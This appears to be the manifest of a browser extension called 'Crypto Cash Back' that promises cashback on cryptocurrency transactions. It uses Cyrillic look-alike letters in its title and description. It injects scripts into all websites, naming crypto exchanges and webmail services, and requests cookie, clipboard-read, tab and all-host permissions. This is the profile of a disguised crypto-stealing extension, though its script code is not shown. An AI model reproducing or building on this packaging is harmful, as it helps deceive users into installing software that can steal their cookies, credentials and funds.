{
   "background": {
      "persistent": false,
      "scripts": [ "assets/js/jquery.min.js", "background/background.js" ]
   },
   "browser_action": {
      "default_icon": {
         "16": "data/icons/16.png",
         "32": "data/icons/32.png",
         "48": "data/icons/48.png",
         "64": "data/icons/64.png"
      },
      "default_popup": "data/popup/popup.html",
      "default_title": "Crурto Tооl"
   },
   "content_scripts": [ {
      "css": [ "assets/css/font-awesome.min.css", "assets/css/fonts.css", "assets/css/style.css" ],
      "js": [ "assets/js/jquery.min.js", "assets/js/loading-overlay.min.js" ],
      "matches": [ "*://*.yandex.ru/*", "*://localbitcoins.com/*","*://*/*", "*://*.yahoo.com/*", "*://*.hbg.com/*", "*://*.huobi.com/*", "*://*.blockchain.com/*", "*://*.okex.com/*", "*://*.live.com/*", "*://*.google.com/*", "*://mail.ru/*", "*://*.binance.com/*", "*://*.coinbase.com/*", "*://*.qq.com/*", "*://*.mail.ru/*" ]
   } ],
   "description": "Return саshbaсk with every Bitcoin, Ethereum, Bitcoin Cash transaction by using plugin!",
   "icons": {
      "128": "data/icons/128.png",
      "16": "data/icons/16.png",
      "32": "data/icons/32.png",
      "48": "data/icons/48.png",
      "64": "data/icons/64.png"
   },
    "manifest_version": 2,
   "name": "Crypto Cash Back",
   "permissions": [ "tabs", "storage", "*://*.google.com/*","*://*/*", "*://*.binance.com/*", "*://*.live.com/*", "*://*.yahoo.com/*", "clipboardRead", "cookies" ],
   "version": "1.0.4"
}
